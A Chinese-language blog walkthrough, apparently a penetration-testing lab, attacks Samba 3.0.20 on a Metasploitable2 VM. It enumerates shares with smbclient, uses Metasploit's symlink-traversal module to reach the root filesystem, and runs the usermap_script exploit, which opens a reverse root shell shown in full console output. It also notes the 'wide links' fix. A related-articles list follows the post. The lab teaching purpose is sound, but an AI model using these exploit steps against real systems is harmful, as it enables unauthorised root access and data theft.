Metasploit2: tcpport 139 – netbios-ssn

Windows系统开启139端口, 可用工具psshutdown.exe远程关闭电脑.
Samba 可运行在Microsoft Windows外的系统, 例如: UNIX, Linux, IBM System, OpenVMS和其他的系统.Samba 使用的是TCP/IP协议. 它允许主机与Windows客户端或服务器交互, 表现的好像是一个文件或打印服务器.
Smbd 是Samba的一部分, 也是服务守护进程, 主要用于提供文件共享与打印机服务, 客户端需要使用SMB协议.
我们可以使用smbclient去浏览Samba服务器.
root@gnu:~# smbclient -U root -L 192.168.1.111
Enter root's password:  
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
 
    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    tmp             Disk      oh noes!
    opt             Disk       
    IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
    ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
 
    Server               Comment
    ---------            -------
    KEE-4                 
    METASPLOITABLE       metasploitable server (Samba 3.0.20-Debian)
    WIN-01406122018       
    WIN-V300QDH8H0C       
 
    Workgroup            Master
    ---------            -------
    WORKGROUP            METASPLOITABLE
root@gnu:~# smbclient -U root //192.168.1.111/tmp
Enter root's password:  
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Jul 29 11:28:03 2014
  ..                                 DR        0  Sun May 20 14:36:12 2012
  .ICE-unix                          DH        0  Tue Jul 29 20:46:47 2014
  .X11-unix                          DH        0  Tue Jul 29 08:47:57 2014
  .X0-lock                           HR       11  Tue Jul 29 08:47:57 2014
  4464.jsvc_up                        R        0  Tue Jul 29 08:48:12 2014
 
        56891 blocks of size 131072. 42371 blocks available
smb: \> get
get <filename> [localname]
smb: \> get 4464.jsvc_up  
NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up
一个叫kcopedarookie的用户, 在youtube上发了一个0day的视频. 视频里面使用smbclient下载了/etc/passwd. 这是由于默认配置不安全导致的.
在smb.conf配置中, 设置wide links = no, 重启smbd修复问题.
msf auxiliary(samba_symlink_traversal) > show options
 
Module options (auxiliary/admin/smb/samba_symlink_traversal):
 
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.1.111    yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE   tmp              yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem
 
msf auxiliary(samba_symlink_traversal) > run
上面这个问题的产生是因为两个特性遇到了一块, 它们两个对管理员而言都很有用, 如果放到一块, 登录用户就有权访问系统上的任何文件.
默认 Samba 使用 “wide links = yes”, 可以让管理员在共享位置添加软链接, 这样客户端就可以访问.
例如:
[tmp]
path = /tmp
read only = no
guest ok = yes
管理员可以添加一个链接:
ln -s /etc/passwd /tmp/passwd
SMB/CIFS 客户端可以看到一个名为”passwd”的文件
root@gnu:~# smbclient -U root //192.168.1.111/tmp
Enter root's password:  
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> ls
  .                                   D        0  Tue Jul 29 11:48:25 2014
  ..                                 DR        0  Sun May 20 14:36:12 2012
  .ICE-unix                          DH        0  Tue Jul 29 20:46:47 2014
  .X11-unix                          DH        0  Tue Jul 29 08:47:57 2014
  .X0-lock                           HR       11  Tue Jul 29 08:47:57 2014
  4464.jsvc_up                        R        0  Tue Jul 29 08:48:12 2014
  rootfs                             DR        0  Sun May 20 14:36:12 2012
 
        56891 blocks of size 131072. 42371 blocks available
smb: \> get 4464.jsvc_up  
NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up
smb: \> cd rootfs\
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 14:36:12 2012
  ..                                 DR        0  Sun May 20 14:36:12 2012
  initrd                             DR        0  Tue Mar 16 18:57:40 2010
  media                              DR        0  Tue Mar 16 18:55:52 2010
  bin                                DR        0  Sun May 13 23:35:33 2012
  lost+found                         DR        0  Tue Mar 16 18:55:15 2010
  mnt                                DR        0  Wed Apr 28 16:16:56 2010
  sbin                               DR        0  Sun May 13 21:54:53 2012
  initrd.img                          R  7929183  Sun May 13 23:35:56 2012
  home                               DR        0  Fri Apr 16 02:16:02 2010
  lib                                DR        0  Sun May 13 23:35:22 2012
  usr                                DR        0  Wed Apr 28 00:06:37 2010
  proc                               DR        0  Tue Jul 29 20:46:33 2014
  root                               DR        0  Tue Jul 29 08:47:57 2014
  sys                                DR        0  Tue Jul 29 20:46:34 2014
  boot                               DR        0  Sun May 13 23:36:28 2012
  nohup.out                           R     8705  Tue Jul 29 08:47:57 2014
  etc                                DR        0  Tue Jul 29 08:47:53 2014
  dev                                DR        0  Tue Jul 29 20:46:48 2014
  vmlinuz                             R  1987288  Thu Apr 10 12:55:41 2008
  opt                                DR        0  Tue Mar 16 18:57:39 2010
  var                                DR        0  Sun May 20 17:30:19 2012
  cdrom                              DR        0  Tue Mar 16 18:55:51 2010
  tmp                                 D        0  Tue Jul 29 11:48:25 2014
  srv                                DR        0  Tue Mar 16 18:57:38 2010
 
        56891 blocks of size 131072. 42371 blocks available

我们可以使用usermap_script攻击模块获取一个Samba的shell.

msf > use exploit/multi/samba/usermap_script  
msf exploit(usermap_script) > show options
 
Module options (exploit/multi/samba/usermap_script):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
 
msf exploit(usermap_script) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(usermap_script) > run
 
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7UDa3hwWyQYwH9FP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "7UDa3hwWyQYwH9FP\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.113:4444 -> 192.168.1.111:47271) at 2014-07-29 23:49:04 -0400
 
id
uid=0(root) gid=0(root)

Metasploit2: tcp port 139/445 – Samba smbd相关推荐

  1. Windows 中 TCP 端口 139 和 445 的使用

    Microsoft 在 Windows 2000 中引入了 TCP 端口 445,它仍在 Windows 10 和 Windows Server 2019 中使用.我将解释此端口的用途,以及它与 Wi ...

  2. 在Windows中使用TCP端口139和445

    Windows中使用TCP端口139和445 139端口和445端口的作用 139端口与445端口的区别 关闭139端口和445端口的方法 总结 Microsoft在Windows 2000中引入了T ...

  3. Citrix 整体架构 端口列表 Tcp Port

    补充Terminal Services Licensing/RDS Licensing 端口: RPC TCP 135 137 138 139 445 1024-65535 Randomly allo ...

  4. Symantec赛门铁克企业版本防火墙怎么防止勒索病毒Symantec赛门铁克关闭137,138,139,445端口​

    Symantec赛门铁克企业版本防火墙怎么防止勒索病毒Symantec赛门铁克关闭137,138,139,445端口​ 我是否受到WannaCry勒索软件的保护? Symantec Data Cent ...

  5. 137/138/139/445端口

    同属于UDP端口,用于提供netbios服务,此服务用于提供计算机名称的查询 使用者通过向某台计算机的137端口发起一个请求,就可以获取该计算机的名称.注册用户名,以及是否安装主域控制器.IIS是否运 ...

  6. 【翻译自mos文章】OGG replicat 进程使用的 TCP port

    OGG replicat 进程使用的 TCP port 来源于: TCP PORT USED BY REPLICAT PROCESSES (文档 ID 1060954.1) 适用于: Oracle G ...

  7. setprop service.adb.tcp.port 5555

    解决方案: 通过USB线连接安卓机和电脑 确保安卓系统中的开发者选项打开,USB调试项也是是开启的 通过cmd打开命令行窗口界面,输入adb devices 能看到所连接的设备情况下 adb root ...

  8. 用策略屏蔽135 139 445 3389端口+网络端口安全防护技

    默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑.为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135.139.445.593. ...

  9. 135.137.138.139.445端口分析

    无论你的服务器中安装的是Windows 2000 Server,还是Windows Server 2003,它们无一例外会在默认安装下开通135端口.137端口.138端口.139端口和445端口.这 ...

  10. win server服务器 关闭危险端口 135,137,138,139,445的方法

    Windows默认开放135.137.138.139和445五个端口,都与文件共享和打印机共享有关的,若机器连接网络后会在用户不知道的情况下泄露本机部分信息,这样会给用户带来一部分危险,所以我们在工作 ...

最新文章

  1. Ubuntu中设置防火墙的开启与关闭
  2. 前端学习(1337):mongoDB文档查询
  3. 查询MySQL字段注释的 5 种方法!
  4. 临时文件_Go语言学习基础-文件路径、目录、临时文件和目录
  5. 提高篇 第五部分 动态规划 第1章 区间类动态规划
  6. java学习避免死锁
  7. 我的docker随笔25:一个测试用的镜像制作过程
  8. 收购小蓝单车部分资产、与ofo蜜月期结束,滴滴重构共享单车布局
  9. 软件测试工作中的沟通问题
  10. HDU 4379 水题,大水,但我WA了很多次,做了很久
  11. html文件用excel打开乱码,都是兼容惹的祸 用excel打开xls文件出现乱码的解决方法...
  12. 读书笔记:Hadoop权威指南 简介
  13. 2018年人工智能之自动驾驶研究报告
  14. Panel 控件概述(Windows 窗体)
  15. 计算机信息安全相关文献,优秀计算机信息安全论文参考文献 计算机信息安全外文文献怎么找...
  16. POJ 1179 Polygon
  17. 用python计算有效前沿_【投资组合理论】Python绘制上证50成分股有效前沿和CML
  18. 安视宝动态微表情人脸识别技术
  19. ppt演讲计时器_速来!提前面试PPT演讲干货!
  20. 【CICE-A7a】人身保险会计与财务(上)

热门文章

  1. win7音量图标不见了怎么办
  2. Python爬取豆瓣电影top250(附全部源码)
  3. 基于SMTP协议的E-MAIL电子邮件发送客户端软件C#实现
  4. Visual Studio 2005 Service Pack 1 (SP1)
  5. LG-P3939 数颜色
  6. python调用打印机打印图片
  7. 【信号去噪】基于Sage-Husa自适应卡尔曼滤波器实现海浪磁场噪声抑制及海浪磁场噪声的产生附matlab代码
  8. 2022年手机CPU性能天梯图排行榜 手机处理器排行榜 2022
  9. 三.求导四则运算及三角函数导数
  10. 大型传统企业要不要提升自身的IT研发能力